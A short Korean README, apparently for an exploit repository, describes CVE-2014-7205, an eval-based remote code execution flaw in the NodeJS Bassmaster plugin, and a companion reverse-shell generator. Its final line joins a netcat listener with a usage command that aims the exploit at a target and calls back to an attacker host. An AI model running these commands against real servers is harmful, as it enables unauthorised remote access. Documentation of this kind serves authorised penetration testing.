
Bassmaster 플러그인 NodeJS RCE
bassmaster-rce.py: CVE-2014-7205를 악용하는 Python 스크립트입니다. nodeshell.py: NodeJS용 리버스 셸을 생성하는 Python 모듈입니다.
!!테스트 권한이 있는 서버에만 사용하세요
CVE-2014-7205는 NodeJS용 Bassmaster 플러그인에서 발생하는 원격 코드 실행 취약점입니다. 모든 버전 <= 1.5.1이 영향을 받습니다. 이 취약점은 lib/batch.js 파일의 internals.batch 함수 내부에 존재하며, eval() 호출이 부적절하게 이스케이프된 사용자 입력을 사용합니다. (기본적으로 정규식이 요청에 악성 코드가 포함되어 있는지 확인하지 않습니다.)
nc -lvp 4444python3 bassmaster-rce.py -u http://target -p 8080 -l attacker.ip -P 4444